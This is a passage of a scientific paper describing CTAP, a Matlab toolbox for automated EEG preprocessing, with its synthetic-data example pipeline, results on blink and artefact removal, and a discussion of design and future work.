producing updated files Set stepSet(x).save = false; set stepSet(x+1).srcID = stepSet(x-1).id Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 9/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Outputs CTAP provides a number of novel outputs for evaluation and data management. Visual evaluation: CTAP automatically produces plots that help the user to answer questions such as: what has been done, what the data looks like and was an analysis step successful or not. The following selected visualisations are illustrated in ‘Results’: � Blinks: detection quality, blink ERP � Bad segments: snippets of raw EEG showing detections � EEG amplitudes: amplitude histograms, peeks � Filtering: PSD comparison � ICA: IC scalp-map contact sheets, zoom-ins of bad components Quantitative evaluation: Every major pipe operation writes a record to the main log file. Data rejections, including channels, epochs, ICs or segments, are summarised here and also tabulated in a separate ‘rejections’ log. Values are given for how much data was marked as bad, and what percentage of the total was bad. If more than 10% of data is marked bad by a single detection, a warning is given in the main log. In addition, useful statistics of each channel are logged at every call to CTAP_peek_data.m, based on the output of the EEGLAB function signalstat.m. Data-points include trimmed and untrimmed versions of mean, median, standard deviation as well as skewness, kurtosis and normality testing. The set of statistics estimated for every data channel is saved in Matlab table format and also aggregated to a log file. Feature export: Extracted EEG features are stored internally as Matlab structs that fully document all aspects of the data. These can be used to do statistical analysis inside Matlab. However, often users like to do feature processing in some other environment such as R or similar. For this, CTAP provides export functionality that transforms the EEG feature mat files into txt/csv text files, and/or an SQLite database. For small projects (e.g. up to 10 subjects and 16 channels) txt/csv export is feasible but for larger datasets SQLite is more practical. System evaluation To showcase what CTAP can do we present in this paper the output of an example analysis using synthetic data. The example is part of the CTAP repository; methods are chosen to illustrate the range of possibilities in CTAP, rather than for the qualities of each method itself. Thus, for example, we include the CTAP-specific blink-correction method alongside simple amplitude thresholding, to exemplify different ways to handle artefacts. Toy data CTAP provides a motivating example that can also be used as a starting point for one’s own analysis pipe. The example is based on synthetically generated data with blink, myogenic (EMG) and channel variance artefacts to demonstrate the usage and output of CTAP. The example is part of the repository and the details of the synthetic data generation process are documented in the wiki. 5 Shortly, synthetic data is generated from 5 https://github.com/bwrc/ctap/wiki/ syndata-generation. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 10/26 https://github.com/bwrc/ctap/wiki/syndata-generation https://github.com/bwrc/ctap/wiki/syndata-generation http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ seed data using generate_synthetic_data_manuscript.m, which first converts the example dataset to EEGLAB-format and then adds artefacts to the data. Seed data included in the repository is from the BCI competition IV dataset 1 6 , recorded with BrainAmp MR plus at 100 Hz on 59 channels. The generated 10 min dataset is sampled at 100 Hz and has 128 EEG channels, two mastoid channels and four EOG channels. It occupies ∼32 MB on disk. Artefacts added to the data include 100 blinks (generated by adding an exponential impulse of fixed duration, with amplitude that decreases linearly from front to rear of the scalp-map); and 50 periods of EMG (generated by adding a burst of noise across an arbitrary frequency band, at a high amplitude that decreases linearly away from a random centre-point). Also six channels are ‘wrecked’ by randomly perturbing the variance, either very high (simulating loose electrodes) or very low (simulating ‘dead’ electrodes). Analysis steps An example pipeline, described in the CTAP repository in the file cfg_manu.m, is run on the synthetic data using runctap_manu.m. Here, we describe the non-trivial analysis steps in order of application. For each step, we first describe the method; then the ‘Results’ section shows the generated outcomes in terms of data quality control statistics and visualisations. The pipe below is shown to illustrate context of the steps, and is an abridged version of the repository code. stepSet(1).id = `1_LOAD'; stepSet(1).funH = {@CTAP_load_data,... @CTAP_load_chanlocs,... @CTAP_reref_data,... @CTAP_peek_data,... @CTAP_blink2event}; stepSet(2).id = `2_FILTER_ICA'; stepSet(2).funH = {@CTAP_fir_filter,... @CTAP_run_ica}; stepSet(3).id = `3_ARTIFACT_CORRECTION'; stepSet(3).funH = {@CTAP_detect_bad_comps,... @CTAP_filter_blink_ica,... @CTAP_detect_bad_channels,... @CTAP_reject_data,... @CTAP_interp_chan, ... @CTAP_detect_bad_segments,... @CTAP_reject_data,... @CTAP_run_ica,... @CTAP_peek_data}; 6 http://bbci.de/competition/iv/desc_1. html. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 11/26 http://bbci.de/competition/iv/desc_1.html http://bbci.de/competition/iv/desc_1.html http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Before-and-after ‘Peeks’: The CTAP_peek_data.m function is called near the start (after initial loading and re-referencing) and the end of the pipe. Visual inspection of raw data is a fundamental step in EEG evaluation and quantitative inspection of channel-wise statistics is also available. A logical approach is to compare raw data at same time-points from before and after any correction operations. If ICA-based corrections are made, the same approach can also be used on the raw IC data. CTAP_peek_data.m expedites this work, and thus helps to regularise data inspection and facilitate comparison. CTAP_peek_data.m will generate raw data plots and statistics of a set of time-points (points are generated randomly by default or can be locked to existing events). These ‘peek-points’ are embedded as events which can then generate peeks at a later stage in the pipe, allowing true before-and-after comparisons even if the data time course changes (due to removal of segments). If no peek-point data remains at the after-stage, no comparison can be made; however (especially if peek-points are randomly chosen), such an outcome is itself a strong indication that the data is very bad, or the detection methods are too strict. CTAP_peek_data.m includes plotting routines for signal amplitude histograms as well as for raw EEG data. Many EEG artefacts cause large changes in signal amplitudes, and consequently several basic, yet effective, EEG artefact detection methods are based on identifying samples exceeding a given amplitude threshold. On the other hand, even in controlled measurement conditions, individual baseline variation can affect the amplitude of the recorded signal. Hence, accurate knowledge of the average signal amplitude is often important. Blink detection: The function CTAP_blink2event.m is called early in the pipe to mark blinks. It creates a set of new events with latencies and durations matched to the detected blinks. The current blink detection implementation is based on a modified version of the EOGERT algorithm by Toivanen, Pettersson & Lukander (2015). 7 The algorithm finds all local peaks in the data, constructs a criterion measure and classifies peaks into blinks and non-blinks based on this measure. Filtering: CTAP filtering produces plots of filter output and tests of functionality as standard. CTAP_fir_filter.m uses the firfilt-plug-in 8 to do filtering, as it replaces the deprecated function pop_eegfilt.m and provides more sensible defaults. Version 1.6.1 of firfilt ships with EEGLAB. Other CTAP-supported filtering options are described in documentation. Blink removal: Blinks can either be rejected or corrected. We showcase correction using a method that combines blink-template matching and FIR high-pass filtering of blink-related ICs following ideas presented by Lindsen & Bhattacharya (2010). The method is not part of EEGLAB, but an add-on provided by CTAP. 9 Bad ICA component detection is performed by first creating ICs with CTAP_run_ica.m 10 , and then using one of several options from CTAP_detect_bad_comps.m to detect artefactual ICs. The blink template option compares mean activity of detected blink events to activations for each IC. CTAP_filter_blink_ica.m is used to filter blink-related IC data, and reconstruct the EEG using the cleaned components. The success of the blink correction is evaluated 7 See code repository at https://github. com/bwrc/eogert. 8 https://github.com/widmann/firfilt. 9 Including all parts described above, this particular blink-correction method is unique to CTAP. 10 Default algorithm is FastICA, requiring the associated toolbox on the user’s Matlab path. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 12/26 https://github.com/bwrc/eogert https://github.com/bwrc/eogert https://github.com/widmann/firfilt http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ using blink evoked response potentials (ERPs) which are simply ERPs computed for blink events (see e.g. Frank & Frishkoff, 2007 for details). Detect raw-data artefacts: Bad channels were detected based on channel variance, with the function vari_bad_chans.m. Log relative variance � was computed for all channels using the formula � ¼ logð channel variance medianðchannel varianceÞÞ. Values of � more than three median absolute deviations away from median (�)were interpreted as deviant and labelled as bad. For bad segments, i.e. short segments of bad data over multiple channels, a common approach (in e.g., EEGLAB) is analysis of fixed length epochs, which is good for ERP experiments. Alternatively for working with continuous data, CTAP also provides the option of amplitude histogram thresholding. Many types of large artefacts can be easily found using simple histogram-based thresholding: a predefined proportion of most extreme amplitude values are marked as artefacts and segments are expanded around these. This can improve, e.g. ICA analysis of low density EEG by freeing ICs to capture neural source signals. For all CTAP_detect_bad_�.m functions, for whichever detection method option is used (user-defined options are also straightforward to add), a field is created in the EEG struct to store the results. Another field collects pointers to all results detected before a rejection. This logic allows the user to call one or many detection functions, possibly pooling the results of several approaches to bad data detection, and then pass the aggregate results to the CTAP_reject_data.m function. Rejection: CTAP usage logic suggests that one or more detect operations for a given data type, e.g. channels, or epochs, or components, should be followed by a reject operation. It is bad practice to detect bad data across modalities, e.g. channels and epochs, before rejecting any of it, because artefacts of one type may affect the other. CTAP_reject_data.m checks the detect field to determine which data type is due for rejection, unless explicitly instructed otherwise. Based on the data labelled by prior calls to detection functions, CTAP_reject_data.m will call an EEGLAB function such as pop_select.m to remove the bad data. Upon rejection, visualisation tools described are used to produce plots that characterise the rejected components. Note that data rejection is only necessary if there exists no method to correct the data, e.g. as is provided for the CTAP blink removal method. In that case the call to the CTAP_detect_bad_�.m function is not followed by a call to CTAP_reject_data.m, because the method corrects the artefactual ICs rather than simply deleting them. After peek: Finally, the CTAP_peek_data.m function is called again, providing comparator data at the same points as the initial peek call. A useful approach is to call CTAP_run_ica.m again after all artefact correction steps. The resulting set of raw IC activations can be plotted by calling CTAP_peek_data.m, and a careful examination should reveal the presence or absence of any remaining sufficiently large artefacts. This is a convenient way to, for example, determine whether the blink detection has identified all blink ICs. RESULTS In this section, we show the output of CTAP as applied to the synthetic dataset, based on the analysis-pipe steps shown above. The pipe outputs ∼30 MB of EEG data after each step set, thus after debugging all steps can be expressed as one set, and data will occupy Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 13/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ ∼62 MB (before and after processing). Additionally, the quality control outputs of this pipe occupy ∼70 MB of space, mostly in the many images of the peek-data and reject-data functions. Before-and-after ‘Peeks’ Raw data: Figure 3 shows raw data before and after preprocessing. EEG amplitudes: The signal amplitude histograms of a sample of good and bad channels from the synthetic data set are shown in Fig. 4. This can be useful for finding a suitable threshold for bad segment detection, or e.g. to detect loose electrodes. The post-processing plots show the improvement in channel normality. Statistical comparison: Some of the first-order statistics calculated for before-and- after comparisons are plotted in Fig. 5, averaged over all channels. This method allows inspection of global change in the signal, which overall can be expected to become less broad (smaller range) and less variable (smaller SD) after cleaning of artefacts. A. B. Figure 3 Raw EEG data centred around a synthetic blink (A) before preprocessing and (B) after preprocessing. The blinks have been largely removed and the EEG activity around blinks has remained intact. Note that the y-axis scales differ slightly. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 14/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Blink detection The EOGERT blink detection process visualises the classification result for quality control purposes, as shown in Fig. 6. Such figures make it easy to spot possible misclassifications. In our example, all 100 blinks inserted into the synthetic data were detected. Figure 4 EEG amplitude histograms for four channels (A) before preprocessing and (B) after preprocessing. Fitted normal probability density function (PDF) is shown as red solid curve. Upper and lower 2.5% quantiles are vertical black solid lines; data inside these limits was used to estimate the trimmed standard deviation (SD) and normal PDF fitted using trimmed SD is shown as black solid curve. Distribution mean is vertical dashed blue line. Channel D15 has clearly been detected as bad, removed and interpolated. Figure 5 Changes in channel statistics for range (A) and standard deviation (SD) (B). Mean over channels is indicated using a dot and the range spans from 5th to 95th percentile. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 15/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Filtering Figure 7 shows one of the outputs of the FIR filtering. This figure can be used to check that the filter has the desired effect on power spectrum and that its response to a unit step function is reasonable. Figure 6 Scatter plot of the criterion used to detect blinks. Horizontal-axis shows the criterion value while vertical-axis is random data to avoid over-plotting. The classification is done by fitting two Gaussian distributions using the EM algorithm and assigning labels based on likelihoods. Figure 7 A visual of filtering effects. (A) The effects of filtering on power spectrum, (B) the filter’s unit step response which can be used to assess, e.g. the filter’s effect on ERP timings. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 16/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Blink removal Bad ICA component detection: An example of a plot for ICA rejection is given in Fig. 8, showing some basic properties of a blink-related IC. Filter blink IC data: The ERP-evaluated success of the blink correction is shown in Fig. 9. The correction method clearly removes most of the blink activity. As blink related ICs are corrected instead of rejected, effects on the underlying EEG are smaller. The result may have some remainder artefact (e.g. visible in Fig. 3 as small spikes after 5 s in channels C17, C18), which may motivate the complete removal of blink-related ICs instead of filtering. Detect and reject raw-data artefacts Bad channels: In total 10 bad channels were found which included all six ‘wrecked’ channels—this shows the algorithm is slightly greedy, which is probably preferable in the case of a high-resolution electrode set with over 100 channels. Bad channels are rejected and interpolated before proceeding (not plotted as it is a straightforward operation). Bad segments: An example of bad segment detection, using simple histogram-based amplitude thresholding, is shown in Fig. 10. In this case, the bad data is high amplitude EMG but in a general setting, e.g. motion artefacts often exhibit extreme amplitudes. Using these figures the user can quickly check what kind of activity exceeds the amplitude threshold in the dataset. Of the 50 EMG artefacts inserted in the synthetic data, 37 still existed at least partially, at the end of pipe. The low rejection percentage is due to the fact that EMG is more of a Figure 8 Independent component information plot for a blink-related ICA component found using blink template matching. Shown are (A) component scalp map, (B) power spectrum and (C) a stacked plot of the time series (using erpimage.m). (C) Shows only 200 first 300 ms segments of the data. The synthetic blinks start at full seconds by design. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 17/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ change in frequency spectrum than in amplitude, yet the pipe looked for deviant amplitudes only. After peek The data comparisons after various artefact removal operations, Figs. 3 and 4, illustrate the success or failure of the pipe. Of course there are a large number of permutations for how this can be done—it is the CTAP philosophy to facilitate free choice among these options, with the least implementation overhead. Additionally, the final plots of raw IC activations should show if there remains any artefacts in the data. For example, Fig. 11 shows a segment of raw data for the first 1/3 of ICs for the synthetic dataset, with clear indications of issues remaining in the data. DISCUSSION We have presented CTAP, an EEG preprocessing workflow-management system that provides extensive functionality for quickly building configurable, comparative, exploratory analysis pipes. Already by shifting the researcher’s focus from scripting to analysis, CTAP can help reduce human effort, subjectivity and consequent error. Figure 9 An example of the blink ERP. (A) The blink-centred ERP before correction with a clearly visible blink signal. (B) The same plot after correction. The blink is clearly removed but the underlying EEG remains largely unaffected because the correction was done in IC base. Channel C17 shows highest blink amplitudes in the synthetic dataset. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 18/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Specifically, the system can reduce the work load of the user by streamlining analysis specification away from function coding. It can improve reliability and objectivity of the analysis by helping users treat each file in a dataset in a uniform, regular manner. CTAP output can also be more easily reproduced because manual processing steps have been minimised. This enables the user to perform multiple comparative analyses for testing the robustness of the results against different preprocessing methods. Philosophy, benefits and issues CTAP provides many default parameters, and streamlines many features into a handful of wrapper functions. This is in order to facilitate rapid build and testing of analysis pipes. The philosophy is to prevent users becoming stuck in a single approach to the data because they have invested time in building the preprocessing code for it from scratch; or worse, because they have completed a laborious manual processing task and cannot afford to repeat it. Computational testing for automated preprocessing structures pipes in function, argument specification files. This approach, instead of only making scripts that call the Figure 10 A bad data segment detected by histogram-based amplitude thresholding (CTAP_detect_bad_segments.m). The 32-channel subset closest to the forehead is shown (C1–C32). The red lines mark the area of the bad segment. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 19/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ required set of functions directly, has several benefits. Function names and parameters become objects available for later processing, so one can operate on them, e.g. to record what was done to logs and to swap functions/parameters on the fly or to check the specification of the pipe. By specifying new approaches in new pipe files, and saving already-tried pipe files, one can treat the files as a record of attempted preprocesses. This record corresponds to the user’s perspective, and thus complements the additional history structure saved to the EEG file, which records all parameters for each operation not only those specified by the user. Finally, the user should not usually rely on defaults (as given by CTAP, EEGLAB or other toolboxes), because the optimal choice often depends on the data. This is also one reason to separately define pipeline and parameters. Separating these as objects is convenient for e.g. testing multiple parameter configurations. A single script file per analysis approach is incompatible with parameter Figure 11 Plot of raw IC activations after all processing steps. IC14 shows clear evidence of EMG noise remaining; while IC36 may indicate a drifting channel. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 20/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ optimisation, because the number of different possible combinations begins to require a layer of code to manage the scripts—this is exactly what CTAP provides. As different analysis strategies and methods can vary greatly, CTAP was implemented as a modular system. Each analysis can be constructed from discrete steps which can be implemented as stand-alone functions. As CTAP is meant to be extended with custom analysis functions the interface between core CTAP features and external scripts is well defined in the documentation. The only requirement is to suppress any pop-ups or GUI-elements, which would prevent the automatic execution of the analysis pipe. 11 It is also up to the user to call the functions in the right order. The system supports branching. This means that the analysis can from a tree-like structure, where some stage is used as input for multiple subsequent workflows. To allow this, any pipe can act as a starting point for another pipe. The CTAP repository provides a simple example get the user going. For branches to appear, a bare minimum is a collection of three pipes of which one is run first. The other two both act on this output but in different ways. Currently the user is responsible for calling the pipes of a branched setting in a meaningful order. However, this is straightforward to implement and having the analysis logic exposed in the main batch file makes it, e.g. easy to run only a subset of the branches. Although CTAP works as a batch-processing pipeline, it supports seamless integration of manual operations. This works such that the user can define a pipeline of operations, insert save points at appropriate steps and work manually on that data before passing it back to the pipe. The main extra benefit that CTAP brings is to handle bookkeeping for all pipeline operations, such that manual operations become exceptional events that can be easily tracked, rather than one more in a large number of operations to manage. Computationaltestingforautomatedpreprocessingneveroverridestheuser’sconfiguration options, even when these might break the pipe. For example, CTAP_reject_data.m contains code to auto-detect the data to reject. However, the user can set this option explicitly, and can do so without having first called any corresponding detection function, which will cause preprocessing on that file to fail. Allowing this failure to happen is the most straightforward approach, and ultimately more robust. Combined with an informative error message the user gets immediate feedback on what is wrong with the pipe. On the other hand, CTAP does provide several features to handle failure gracefully. As noted, the pipe will not crash if a single file has an unrecoverable error, although that file will not be processed further. This allows a batch to run unsupervised. Then, because no existing outputs are overwritten automatically, one can easily mop-up the files that failed without redoing all those that succeeded, if the fault is identified. Because pipes can be divided into step sets, tricky processes that are prone to failure can be isolated to reduce the overall time spent on crash recovery. CTAP saves crashed files at the point of failure (by setting the parameter ‘trackfail’ in CTAP_pipeline_looper.m), permitting closer analysis of the problematic data. In contrast to many analysis plug-ins built on top of EEGLAB, no GUI was included in CTAP. While GUIs have their advantages (more intuitive data exploration, easier 11 As noted above, for this reason much original code has been refactored to avoid runtime-visible or focus-grabbing outputs. The ultimate aim is for CTAP to interface directly to Matlab functions to remove dependency on EEGLAB releases, while retaining compatibility with the EEGLAB data structure. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 21/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ for novice users, etc.) there is a very poor return on investment for adding one to a complex batch-processing system like CTAP. A GUI also sets limits to configurability and can constrain automation if CTAP is executed on a hardware without graphical capabilities. The absence of GUI also makes the development of extensions easier as there are fewer dependencies to handle. In contrast to many other broad-focus physiological data analysis tools, CTAP is designed to meet a very focused goal with a specific approach. This does however create some drawbacks. Compared to scripting one’s own pipeline from scratch, there are usage constraints imposed by the heavy use of struct-passing interfaces. Some non-obvious features may take time to master, and it can be difficult (albeit unnecessary) to understand the more complex underlying processes. Computational testing for automated preprocessing is also built to enable easy further development by third parties, by using standardised interfaces and structures. This was a feature of original EEGLAB code, but contrasts with many of the EEGLAB-compatible tools released since, whose functionality was often built-in an ad hoc manner. The main requirement for development is to understand the content and purpose of the EEG.CTAP field (which is extensively documented in the wiki), and the general logic of CTAP. Developers can easily extend the toolbox by using (or emulating) the existing ctapeeg\_�.m functions, especially the ctapeeg_detect_�.m functions, which are simply interfaces to external tools for detecting artefacts. Existing CTAP_�.m functions can be relatively more complex to understand, but the existing template provides a guideline for development with the correct interface. Future work Computational testing for automated preprocessing is far from finalised, and development will continue after the initial release of the software. The main aim of future work is to evolve CTAP from workflow management towards better automation, with computational comparative testing of analysis methods, to discover optimal parameters and help evaluate competing approaches. As stated above, the potential to fully automate EEG processing is constrained by the indeterminacy of EEG: known as the inverse problem, this means that it is not possible to precisely determine a ground-truth for the signal, i.e. a unique relationship to neural sources. The signal can also be highly variable between individuals, and even between intra-individual recording sessions (Dandekar et al., 2007). These factors imply that there cannot be a general algorithmic solution to extract neurally generated electrical field information from EEG, thus always requiring some human intervention. By contrast, for example in MEG certain physical properties of the system permit inference of sources even from very noisy data (Taulu & Hari, 2009) (although recording of clean data is always preferable, it is not always possible, e.g. with deep brain stimulation patients (Airaksinen et al., 2011)). While many publications have described methods for processing EEG for different purposes, such as removing artefacts, estimating signal sources, analysing ERPs and so on. However, despite the wealth of methodological work done, there is a lack of Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 22/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ benchmarking or tools for comparison of such methods. The outcome is that the most reliable way to assess each method is to learn how it works, apply it and test the outcome on one’s own data: this is a highly time-consuming process which is hardly competitive with simply performing the bulk of preprocessing in a manual way, as seems to remain the gold standard. The effect of each method on the data is also not commonly characterised, such that methods to correct artefacts can often introduce noise to the data, especially where there was no artefact (false positives). Thus, we also aim to enable testing and comparison of automated methods for preprocessing. This is still work in progress, as we are building an extension for CTAP that improves testing and comparison of preprocessing methods by repeated analyses on synthetic data. This extension, tentatively titled Handler for sYnthetic Data and Repeated Analyses (HYDRA), will use synthetic data to generate ground-truth controlled tests of preprocessing methods. It will have capability to generate new synthetic data matching the parameters of the lab’s own data, and compare outcomes of methods applied to this data in a principled computational manner. This will allow experimenters to find good methods for their data, or developers to flexibly test and benchmark their novel methods. Another desirable, though non-vital, future task is to expand the quality control output, to include functionality such as statistical testing of detected bad data, for the experimenter to make a more informed decision. Although statistical testing is already implied in many methods of bad data detection, it is not visible to users. This will take the form of automated tools to compare output from two (or more) peeks, to help visualise changes in both baseline level and local wave forms. Such aims naturally complement the work of others in the field, and it is hoped that opportunities arise to pool resources and develop better solutions by collaboration. CONCLUSION The ultimate goal of CTAP is to improve on typical ways of preprocessing high- dimensional EEG data through a structured framework for automation. We will meet this goal via the following three steps: (a) facilitate processing of large quantities of EEG data; (b) improve reliability and objectivity of such processing; (c) support development of smart algorithms to tune the thresholds of statistical selection methods (for bad channels, epochs, segments or components) to provide results which are robust enough to minimise manual intervention. We have now addressed aim (a), partly also (b) and laid the groundwork to continue developing solutions for (c). Thus, the work described here provides the solid foundation needed to complete CTAP, and thereby help to minimise human effort, subjectivity and error in EEG analysis; and facilitate easy, reliable batch-processing for experts and novices alike. ACKNOWLEDGEMENTS The authors would like to thank Andreas Henelius, Miika Toivanen, Kristian Lukander and Lauri Ahonen for fruitful discussions on the CTAP toolbox and this paper. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 23/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was partly supported by the Revolution of Knowledge Work project no. 40228/13, funded by Tekes—the Finnish Funding Agency for Technology and Innovation. The funders had no role in study design, data collection and analysis, decision to publish or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Revolution of Knowledge Work project no. 40228/13, funded by Tekes—the Finnish Funding Agency for Technology and Innovation. Competing Interests The authors declare that they have no competing interests. Author Contributions � Benjamin U. Cowley conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � Jussi Korpela conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � Jari Torniainen conceived and designed the experiments, performed the experiments, analysed the data, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. Data Deposition The following information was supplied regarding data availability: https://github.com/bwrc/ctap. REFERENCES Agapov SN, Bulanov VA, Zakharov AV, Sergeeva MS. 2016. Review of analytical instruments for EEG analysis. Available at http://arxiv.org/abs/1605.01381. Airaksinen K, Mäkelä JP, Taulu S, Ahonen A, Nurminen J, Schnitzler A, Pekkonen E. 2011. Effects of DBS on auditory and somatosensory processing in Parkinson’s disease. Human Brain Mapping 32(7):1091–1099 DOI 10.1002/hbm.21096. Baillet S, Friston K, Oostenveld R. 2011. Academic software applications for electromagnetic brain mapping using MEG and EEG. Computational Intelligence and Neuroscience 2011:1–4 DOI 10.1155/2011/972050. Baillet S, Tadel F, Leahy RM, Mosher JC, Delorme A, Makeig S, Oostenveld R, Hämäläinen M, Dalal SS, Zumer J, Clerc M, Wolters CH, Kiebel S, Jensen O. 2010. Academic Software Toolboxes for the Analysis of MEG Data. Berlin: Springer, 101–104 [Chapter Academic S]. Bao FS, Liu X, Zhang C. 2011. PyEEG: an open source Python module for EEG/MEG feature extraction. Computational Intelligence and Neuroscience 2011:1–7 DOI 10.1155/2011/406391. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 24/26 https://github.com/bwrc/ctap http://arxiv.org/abs/1605.01381 http://dx.doi.org/10.1002/hbm.21096 http://dx.doi.org/10.1155/2011/972050 http://dx.doi.org/10.1155/2011/406391 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Barua S, Begum S. 2014. A review on machine learning algorithms in handling EEG artifacts. In: Jensfelt P, ed. The Swedish AI Society (SAIS) Workshop SAIS, 14, 22–23 May 2014, Stockholm, Sweden. Bellec P, Lavoie-Courchesne S, Dickinson P, Lerch JP, Zijdenbos AP, Evans AC. 2012. The pipeline system for Octave and Matlab (PSOM): a lightweight scripting framework and execution engine for scientific workflows. Frontiers in Neuroinformatics 6:7 DOI 10.3389/fninf.2012.00007. Bigdely-Shamlo N, Mullen T, Kothe C, Su K-M, Robbins KA. 2015. The PREP pipeline: standardized preprocessing for large-scale EEG analysis. Frontiers in Neuroinformatics 9:16 DOI 10.3389/fninf.2015.00016. Chaumon M, Bishop DVM, Busch NA. 2015. A practical guide to the selection of independent components of the electroencephalogram for artifact correction. Journal of Neuroscience Methods 250:47–63 DOI 10.1016/j.jneumeth.2015.02.025. Cowley B, Filetti M, Lukander K, Torniainen J, Henelius A, Ahonen L, Barral O, Kosunen I, Valtonen T, Huotilainen M, Ravaja N, Jaccuci G. 2016. The psychophysiology primer: a guide to methods and a broad review with a focus on human–computer interaction. Foundations and Trends in HCI 9(3–4):151–308 DOI 10.1561/1100000065. Dandekar S, Ales J, Carney T, Klein SA. 2007. Methods for quantifying intra- and inter-subject variability of evoked potential data applied to the multifocal visual evoked potential. Journal of Neuroscience Methods 165(2):270–286 DOI 10.1016/j.jneumeth.2007.06.010. Delorme A, Makeig S. 2004. EEGLAB: an open source toolbox for analysis of single-trial EEG dynamics including independent component analysis. Journal of Neuroscience Methods 134(1):9–21 DOI 10.1016/j.jneumeth.2003.10.009. Delorme A, Mullen T, Kothe C, Akalin Acar Z, Bigdely-Shamlo N, Vankov A, Makeig S. 2011. EEGLAB, SIFT, NFT, BCILAB, and ERICA: new tools for advanced EEG processing. Computational Intelligence and Neuroscience 2011:1–12 DOI 10.1155/2011/130714. Delorme A, Palmer J, Onton J, Oostenveld R, Makeig S. 2012. Independent EEG sources are dipolar. PLoS ONE 7(2):e30135 DOI 10.1371/journal.pone.0030135. Delorme A, Sejnowski T, Makeig S. 2007. Enhanced detection of artifacts in EEG data using higher-order statistics and independent component analysis. NeuroImage 34(4):1443–1449 DOI 10.1016/j.neuroimage.2006.11.004. Frank RM, Frishkoff GA. 2007. Automated protocol for evaluation of electromagnetic component separation (APECS): application of a framework for evaluating statistical methods of blink extraction from multichannel EEG. Clinical Neurophysiology 118(1):80–97 DOI 10.1016/j.clinph.2006.07.317. Gramfort A, Luessi M, Larson E, Engemann DA, Strohmeier D, Brodbeck C, Goj R, Jas M, Brooks T, Parkkonen L, Hämäläinen M. 2013. MEG and EEG data analysis with MNE-Python. Frontiers in Neuroscience 7:267 DOI 10.1016/j.neuroimage.2006.11.004. Keil A, Debener S, Gratton G, Junghöfer M, Kappenman ES, Luck SJ, Luu P, Miller GA, Yee CM. 2014. Committee report: publication guidelines and recommendations for studies using electroencephalography and magnetoencephalography. Psychophysiology 51(1):1–21 DOI 10.1111/psyp.12147. Lindsen JP, Bhattacharya J. 2010. Correction of blink artifacts using independent component analysis and empirical mode decomposition. Psychophysiology 47(5):955–960 DOI 10.1111/j.1469-8986.2010.00995.x. Mognon A, Jovicich J, Bruzzone L, Buiatti M. 2011. ADJUST: an automatic EEG artifact detector based on the joint use of spatial and temporal features. Psychophysiology 48(2):229–240 DOI 10.1111/j.1469-8986.2010.01061.x. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 25/26 http://dx.doi.org/10.3389/fninf.2012.00007 http://dx.doi.org/10.3389/fninf.2015.00016 http://dx.doi.org/10.1016/j.jneumeth.2015.02.025 http://dx.doi.org/10.1561/1100000065 http://dx.doi.org/10.1016/j.jneumeth.2007.06.010 http://dx.doi.org/10.1016/j.jneumeth.2003.10.009 http://dx.doi.org/10.1155/2011/130714 http://dx.doi.org/10.1371/journal.pone.0030135 http://dx.doi.org/10.1016/j.neuroimage.2006.11.004 http://dx.doi.org/10.1016/j.clinph.2006.07.317 http://dx.doi.org/10.1016/j.neuroimage.2006.11.004 http://dx.doi.org/10.1111/psyp.12147 http://dx.doi.org/10.1111/j.1469-8986.2010.00995.x http://dx.doi.org/10.1111/j.1469-8986.2010.01061.x http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ Nolan H, Whelan R, Reilly RB. 2010. FASTER: fully automated statistical thresholding for EEG artifact rejection. Journal of Neuroscience Methods 192(1):152–162. Oostenveld R, Fries P, Maris E, Schoffelen J-M. 2011. FieldTrip: open source software for advanced analysis of MEG, EEG, and invasive electrophysiological data. Computational Intelligence and Neuroscience 2011:1–9 DOI 10.1155/2011/156869. Ovaska 